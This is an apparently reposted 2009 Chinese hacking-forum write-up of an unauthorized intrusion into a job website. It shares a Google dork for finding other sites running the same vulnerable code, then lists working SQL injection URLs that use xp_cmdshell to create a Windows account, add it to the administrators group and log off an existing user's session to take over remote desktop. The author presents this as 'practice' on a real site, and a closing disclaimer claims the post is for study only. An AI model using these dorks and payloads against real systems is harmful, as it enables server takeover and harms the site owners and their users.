欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

一次无聊的检测

来源:转载 作者:んㄗ葑訫鎖愛 时间:2009-11-20 TAG: 我要投稿
一次无聊的检测。这几天停电,可把我给憋坏了!好不容易电来了,赶紧翻出个源码,简单看了下,发现个注入点,上google去实战。这里我就把这个公布出来吧。Google:inurl:com_job_list1.asp?id 可以注入,是某人才网的源码。找了个注入点,在啊D检测是sa权限。记得某人说过,sa权限拿不下网站只能说明你技术问题。
既然是sa权限,偶当然不能放过了,列目录了一下,发现不能,这时候就想到了xp_cmdshell了,由于在啊D里干啥都没回显,手动测试。
提交http://www.xxx.com/com_job_list1.asp?id=6228 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
返回正常,
赶紧加个帐号先,http://www.xxx.com/com_job_list1.asp?id=6228;exec master.dbo.xp_cmdshell 'net user shaun 111 /add';--

加如管理员组
http://www.xxx.com/com_job_list1.asp?id=6228;exec master.dbo.xp_cmdshell 'net localgroup administrators shaun /add';--

远程桌面可以连接,但是登陆时提示远程服务器超出最大允许连接数,mlgb,踢掉一个,http://www.xxx.com/com_job_list1.asp?id=6228;exec master.dbo.xp_cmdshell 'logoff 1';--

这回可以正常登陆,
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载